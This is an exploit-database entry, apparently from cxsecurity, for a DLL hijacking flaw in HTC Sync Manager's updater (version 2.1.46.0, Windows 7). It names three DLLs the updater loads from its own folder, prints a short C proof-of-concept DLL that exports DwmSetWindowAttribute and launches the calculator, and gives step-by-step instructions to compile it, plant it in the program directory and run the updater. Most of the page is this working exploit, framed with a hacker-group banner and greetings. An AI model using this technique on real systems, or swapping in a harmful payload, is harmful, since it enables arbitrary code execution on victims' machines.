HTCSyncManagerUpdate DLL Hijacking

2013.08.12
Credit: Iranian_Dark_Coders_Team
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution Author: Iranian_Dark_Coders_Team Discovered by A.CH12 Software Link: http://www.htc.com/ Version: 2.1.46.0 Tested on: Windows 7 // :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######:: // ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##: // :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##: // '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######:: // #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##:::::::: // ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##:::::::: // ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########: // ..:::::..:::::...::::::......:::..:::::..:::......::.........:: ============================================================= #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int egg() { system ("calc"); exit(0); return 0; } ============================================================= Instructions: 1. Compile dll 2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll 3. Launch HTCSyncManagerUpdate 4. Bo0o0o0o0o0o0o0m ! Greet to my Lovely friends : nimaarek , D.S (ASA);

References:

http://www.htc.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top